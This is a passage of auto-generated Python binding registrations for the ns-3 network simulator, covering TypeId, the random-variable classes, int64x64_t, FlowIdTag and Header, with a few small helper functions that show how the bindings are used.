## random-variable.h (module 'core'): ns3::TriangularVariable::TriangularVariable(ns3::TriangularVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TriangularVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::TriangularVariable::TriangularVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::TriangularVariable::TriangularVariable(double s, double l, double mean) [constructor]
cls.add_constructor([param('double', 's'), param('double', 'l'), param('double', 'mean')])
return
def register_Ns3TypeId_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## type-id.h (module 'core'): ns3::TypeId::TypeId(char const * name) [constructor]
cls.add_constructor([param('char const *', 'name')])
## type-id.h (module 'core'): ns3::TypeId::TypeId() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TypeId(ns3::TypeId const & o) [copy constructor]
cls.add_constructor([param('ns3::TypeId const &', 'o')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, uint32_t flags, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('uint32_t', 'flags'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddTraceSource(std::string name, std::string help, ns3::Ptr<ns3::TraceSourceAccessor const> accessor) [member function]
cls.add_method('AddTraceSource',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::Ptr< ns3::TraceSourceAccessor const >', 'accessor')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation ns3::TypeId::GetAttribute(uint32_t i) const [member function]
cls.add_method('GetAttribute',
'ns3::TypeId::AttributeInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetAttributeFullName(uint32_t i) const [member function]
cls.add_method('GetAttributeFullName',
'std::string',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetAttributeN() const [member function]
cls.add_method('GetAttributeN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): ns3::Callback<ns3::ObjectBase*,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ns3::TypeId::GetConstructor() const [member function]
cls.add_method('GetConstructor',
'ns3::Callback< ns3::ObjectBase *, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetGroupName() const [member function]
cls.add_method('GetGroupName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetName() const [member function]
cls.add_method('GetName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::GetParent() const [member function]
cls.add_method('GetParent',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::GetRegistered(uint32_t i) [member function]
cls.add_method('GetRegistered',
'ns3::TypeId',
[param('uint32_t', 'i')],
is_static=True)
## type-id.h (module 'core'): static uint32_t ns3::TypeId::GetRegisteredN() [member function]
cls.add_method('GetRegisteredN',
'uint32_t',
[],
is_static=True)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation ns3::TypeId::GetTraceSource(uint32_t i) const [member function]
cls.add_method('GetTraceSource',
'ns3::TypeId::TraceSourceInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetTraceSourceN() const [member function]
cls.add_method('GetTraceSourceN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): uint16_t ns3::TypeId::GetUid() const [member function]
cls.add_method('GetUid',
'uint16_t',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasConstructor() const [member function]
cls.add_method('HasConstructor',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasParent() const [member function]
cls.add_method('HasParent',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::HideFromDocumentation() [member function]
cls.add_method('HideFromDocumentation',
'ns3::TypeId',
[])
## type-id.h (module 'core'): bool ns3::TypeId::IsChildOf(ns3::TypeId other) const [member function]
cls.add_method('IsChildOf',
'bool',
[param('ns3::TypeId', 'other')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::LookupAttributeByName(std::string name, ns3::TypeId::AttributeInformation * info) const [member function]
cls.add_method('LookupAttributeByName',
'bool',
[param('std::string', 'name'), param('ns3::TypeId::AttributeInformation *', 'info', transfer_ownership=False)],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByName(std::string name) [member function]
cls.add_method('LookupByName',
'ns3::TypeId',
[param('std::string', 'name')],
is_static=True)
## type-id.h (module 'core'): ns3::Ptr<ns3::TraceSourceAccessor const> ns3::TypeId::LookupTraceSourceByName(std::string name) const [member function]
cls.add_method('LookupTraceSourceByName',
'ns3::Ptr< ns3::TraceSourceAccessor const >',
[param('std::string', 'name')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::MustHideFromDocumentation() const [member function]
cls.add_method('MustHideFromDocumentation',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::SetAttributeInitialValue(uint32_t i, ns3::Ptr<ns3::AttributeValue const> initialValue) [member function]
cls.add_method('SetAttributeInitialValue',
'bool',
[param('uint32_t', 'i'), param('ns3::Ptr< ns3::AttributeValue const >', 'initialValue')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetGroupName(std::string groupName) [member function]
cls.add_method('SetGroupName',
'ns3::TypeId',
[param('std::string', 'groupName')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetParent(ns3::TypeId tid) [member function]
cls.add_method('SetParent',
'ns3::TypeId',
[param('ns3::TypeId', 'tid')])
## type-id.h (module 'core'): void ns3::TypeId::SetUid(uint16_t tid) [member function]
cls.add_method('SetUid',
'void',
[param('uint16_t', 'tid')])
return
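# Illustrative sketch only: introspecting a wrapped class through the TypeId methods
# registered above (LookupByName, GetAttributeN, GetAttributeFullName), assuming the
# core bindings import as ns.core and that "ns3::Object" is a registered TypeId.
def _example_typeid_introspection():
    import ns.core  # assumed import path
    tid = ns.core.TypeId.LookupByName("ns3::Object")
    # Enumerate the fully qualified attribute names known for this TypeId.
    return [tid.GetAttributeFullName(i) for i in range(tid.GetAttributeN())]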
def register_Ns3TypeIdAttributeInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation(ns3::TypeId::AttributeInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::AttributeInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::AttributeAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::checker [variable]
cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::flags [variable]
cls.add_instance_attribute('flags', 'uint32_t', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::initialValue [variable]
cls.add_instance_attribute('initialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::originalInitialValue [variable]
cls.add_instance_attribute('originalInitialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
return
def register_Ns3TypeIdTraceSourceInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation(ns3::TypeId::TraceSourceInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::TraceSourceInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::TraceSourceAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
return
def register_Ns3UniformVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::UniformVariable::UniformVariable(ns3::UniformVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UniformVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::UniformVariable::UniformVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::UniformVariable::UniformVariable(double s, double l) [constructor]
cls.add_constructor([param('double', 's'), param('double', 'l')])
## random-variable.h (module 'core'): uint32_t ns3::UniformVariable::GetInteger(uint32_t s, uint32_t l) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 's'), param('uint32_t', 'l')])
## random-variable.h (module 'core'): double ns3::UniformVariable::GetValue() const [member function]
cls.add_method('GetValue',
'double',
[],
is_const=True)
## random-variable.h (module 'core'): double ns3::UniformVariable::GetValue(double s, double l) [member function]
cls.add_method('GetValue',
'double',
[param('double', 's'), param('double', 'l')])
return
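# Illustrative sketch only: drawing values through the (pre-ns-3.15 style) random
# variable bindings registered above, assuming the core bindings import as ns.core.
def _example_uniform_variable_usage():
    import ns.core  # assumed import path
    uv = ns.core.UniformVariable(0.0, 1.0)            # uniform on [0, 1)
    sample = uv.GetValue()                            # one double draw
    die = ns.core.UniformVariable().GetInteger(1, 6)  # integer draw in [1, 6]
    return sample, die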
def register_Ns3WeibullVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::WeibullVariable::WeibullVariable(ns3::WeibullVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::WeibullVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::WeibullVariable::WeibullVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::WeibullVariable::WeibullVariable(double m) [constructor]
cls.add_constructor([param('double', 'm')])
## random-variable.h (module 'core'): ns3::WeibullVariable::WeibullVariable(double m, double s) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 's')])
## random-variable.h (module 'core'): ns3::WeibullVariable::WeibullVariable(double m, double s, double b) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 's'), param('double', 'b')])
return
def register_Ns3ZetaVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::ZetaVariable::ZetaVariable(ns3::ZetaVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ZetaVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::ZetaVariable::ZetaVariable(double alpha) [constructor]
cls.add_constructor([param('double', 'alpha')])
## random-variable.h (module 'core'): ns3::ZetaVariable::ZetaVariable() [constructor]
cls.add_constructor([])
return
def register_Ns3ZipfVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::ZipfVariable::ZipfVariable(ns3::ZipfVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ZipfVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::ZipfVariable::ZipfVariable(long int N, double alpha) [constructor]
cls.add_constructor([param('long int', 'N'), param('double', 'alpha')])
## random-variable.h (module 'core'): ns3::ZipfVariable::ZipfVariable() [constructor]
cls.add_constructor([])
return
def register_Ns3Empty_methods(root_module, cls):
## empty.h (module 'core'): ns3::empty::empty() [constructor]
cls.add_constructor([])
## empty.h (module 'core'): ns3::empty::empty(ns3::empty const & arg0) [copy constructor]
cls.add_constructor([param('ns3::empty const &', 'arg0')])
return
def register_Ns3Int64x64_t_methods(root_module, cls):
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_unary_numeric_operator('-')
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('>')
cls.add_binary_comparison_operator('!=')
cls.add_inplace_numeric_operator('*=', param('ns3::int64x64_t const &', 'right'))
cls.add_inplace_numeric_operator('+=', param('ns3::int64x64_t const &', 'right'))
cls.add_inplace_numeric_operator('-=', param('ns3::int64x64_t const &', 'right'))
cls.add_inplace_numeric_operator('/=', param('ns3::int64x64_t const &', 'right'))
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('<=')
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('>=')
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t() [constructor]
cls.add_constructor([])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(double v) [constructor]
cls.add_constructor([param('double', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(int v) [constructor]
cls.add_constructor([param('int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long int v) [constructor]
cls.add_constructor([param('long int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long long int v) [constructor]
cls.add_constructor([param('long long int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(unsigned int v) [constructor]
cls.add_constructor([param('unsigned int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long unsigned int v) [constructor]
cls.add_constructor([param('long unsigned int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long long unsigned int v) [constructor]
cls.add_constructor([param('long long unsigned int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(int64_t hi, uint64_t lo) [constructor]
cls.add_constructor([param('int64_t', 'hi'), param('uint64_t', 'lo')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(ns3::int64x64_t const & o) [copy constructor]
cls.add_constructor([param('ns3::int64x64_t const &', 'o')])
## int64x64-double.h (module 'core'): double ns3::int64x64_t::GetDouble() const [member function]
cls.add_method('GetDouble',
'double',
[],
is_const=True)
## int64x64-double.h (module 'core'): int64_t ns3::int64x64_t::GetHigh() const [member function]
cls.add_method('GetHigh',
'int64_t',
[],
is_const=True)
## int64x64-double.h (module 'core'): uint64_t ns3::int64x64_t::GetLow() const [member function]
cls.add_method('GetLow',
'uint64_t',
[],
is_const=True)
## int64x64-double.h (module 'core'): static ns3::int64x64_t ns3::int64x64_t::Invert(uint64_t v) [member function]
cls.add_method('Invert',
'ns3::int64x64_t',
[param('uint64_t', 'v')],
is_static=True)
## int64x64-double.h (module 'core'): void ns3::int64x64_t::MulByInvert(ns3::int64x64_t const & o) [member function]
cls.add_method('MulByInvert',
'void',
[param('ns3::int64x64_t const &', 'o')])
return
def register_Ns3Chunk_methods(root_module, cls):
## chunk.h (module 'network'): ns3::Chunk::Chunk() [constructor]
cls.add_constructor([])
## chunk.h (module 'network'): ns3::Chunk::Chunk(ns3::Chunk const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Chunk const &', 'arg0')])
## chunk.h (module 'network'): uint32_t ns3::Chunk::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_pure_virtual=True, is_virtual=True)
## chunk.h (module 'network'): static ns3::TypeId ns3::Chunk::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## chunk.h (module 'network'): void ns3::Chunk::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3ConstantVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::ConstantVariable::ConstantVariable(ns3::ConstantVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ConstantVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::ConstantVariable::ConstantVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::ConstantVariable::ConstantVariable(double c) [constructor]
cls.add_constructor([param('double', 'c')])
## random-variable.h (module 'core'): void ns3::ConstantVariable::SetConstant(double c) [member function]
cls.add_method('SetConstant',
'void',
[param('double', 'c')])
return
def register_Ns3DeterministicVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::DeterministicVariable::DeterministicVariable(ns3::DeterministicVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::DeterministicVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::DeterministicVariable::DeterministicVariable(double * d, uint32_t c) [constructor]
cls.add_constructor([param('double *', 'd'), param('uint32_t', 'c')])
return
def register_Ns3EmpiricalVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::EmpiricalVariable::EmpiricalVariable(ns3::EmpiricalVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EmpiricalVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::EmpiricalVariable::EmpiricalVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): void ns3::EmpiricalVariable::CDF(double v, double c) [member function]
cls.add_method('CDF',
'void',
[param('double', 'v'), param('double', 'c')])
return
def register_Ns3ErlangVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::ErlangVariable::ErlangVariable(ns3::ErlangVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ErlangVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::ErlangVariable::ErlangVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::ErlangVariable::ErlangVariable(unsigned int k, double lambda) [constructor]
cls.add_constructor([param('unsigned int', 'k'), param('double', 'lambda')])
## random-variable.h (module 'core'): double ns3::ErlangVariable::GetValue() const [member function]
cls.add_method('GetValue',
'double',
[],
is_const=True)
## random-variable.h (module 'core'): double ns3::ErlangVariable::GetValue(unsigned int k, double lambda) const [member function]
cls.add_method('GetValue',
'double',
[param('unsigned int', 'k'), param('double', 'lambda')],
is_const=True)
return
def register_Ns3ExponentialVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::ExponentialVariable::ExponentialVariable(ns3::ExponentialVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ExponentialVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::ExponentialVariable::ExponentialVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::ExponentialVariable::ExponentialVariable(double m) [constructor]
cls.add_constructor([param('double', 'm')])
## random-variable.h (module 'core'): ns3::ExponentialVariable::ExponentialVariable(double m, double b) [constructor]
cls.add_constructor([param('double', 'm'), param('double', 'b')])
return
def register_Ns3FlowIdTag_methods(root_module, cls):
## flow-id-tag.h (module 'network'): ns3::FlowIdTag::FlowIdTag(ns3::FlowIdTag const & arg0) [copy constructor]
cls.add_constructor([param('ns3::FlowIdTag const &', 'arg0')])
## flow-id-tag.h (module 'network'): ns3::FlowIdTag::FlowIdTag() [constructor]
cls.add_constructor([])
## flow-id-tag.h (module 'network'): ns3::FlowIdTag::FlowIdTag(uint32_t flowId) [constructor]
cls.add_constructor([param('uint32_t', 'flowId')])
## flow-id-tag.h (module 'network'): static uint32_t ns3::FlowIdTag::AllocateFlowId() [member function]
cls.add_method('AllocateFlowId',
'uint32_t',
[],
is_static=True)
## flow-id-tag.h (module 'network'): void ns3::FlowIdTag::Deserialize(ns3::TagBuffer buf) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'buf')],
is_virtual=True)
## flow-id-tag.h (module 'network'): uint32_t ns3::FlowIdTag::GetFlowId() const [member function]
cls.add_method('GetFlowId',
'uint32_t',
[],
is_const=True)
## flow-id-tag.h (module 'network'): ns3::TypeId ns3::FlowIdTag::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_const=True, is_virtual=True)
## flow-id-tag.h (module 'network'): uint32_t ns3::FlowIdTag::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True, is_virtual=True)
## flow-id-tag.h (module 'network'): static ns3::TypeId ns3::FlowIdTag::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## flow-id-tag.h (module 'network'): void ns3::FlowIdTag::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True, is_virtual=True)
## flow-id-tag.h (module 'network'): void ns3::FlowIdTag::Serialize(ns3::TagBuffer buf) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'buf')],
is_const=True, is_virtual=True)
## flow-id-tag.h (module 'network'): void ns3::FlowIdTag::SetFlowId(uint32_t flowId) [member function]
cls.add_method('SetFlowId',
'void',
[param('uint32_t', 'flowId')])
return
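# Illustrative sketch only: minimal use of the FlowIdTag bindings registered above,
# assuming the generated network module imports as ns.network (import path assumed).
def _example_flow_id_tag_usage():
    import ns.network  # assumed import path for the ns-3 network bindings
    tag = ns.network.FlowIdTag(ns.network.FlowIdTag.AllocateFlowId())  # fresh flow id
    tag.SetFlowId(42)       # overwrite with an explicit id
    return tag.GetFlowId()  # -> 42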
def register_Ns3GammaVariable_methods(root_module, cls):
## random-variable.h (module 'core'): ns3::GammaVariable::GammaVariable(ns3::GammaVariable const & arg0) [copy constructor]
cls.add_constructor([param('ns3::GammaVariable const &', 'arg0')])
## random-variable.h (module 'core'): ns3::GammaVariable::GammaVariable() [constructor]
cls.add_constructor([])
## random-variable.h (module 'core'): ns3::GammaVariable::GammaVariable(double alpha, double beta) [constructor]
cls.add_constructor([param('double', 'alpha'), param('double', 'beta')])
## random-variable.h (module 'core'): double ns3::GammaVariable::GetValue() const [member function]
cls.add_method('GetValue',
'double',
[],
is_const=True)
## random-variable.h (module 'core'): double ns3::GammaVariable::GetValue(double alpha, double beta) const [member function]
cls.add_method('GetValue',
'double',
[param('double', 'alpha'), param('double', 'beta')],
is_const=True)
return
def register_Ns3Header_methods(root_module, cls):
cls.add_output_stream_operator()
## header.h (module 'network'): ns3::Header::Header() [constructor]
cls.add_constructor([])
## header.h (module 'network'): ns3::Header::Header(ns3::Header const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Header const &', 'arg0')])
## header.h (module 'network'): uint32_t ns3::Header::Deserialize(ns3::Buffer::Iterator start) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('ns3::Buffer::Iterator', 'start')],
is_pure_virtual=True, is_virtual=True)
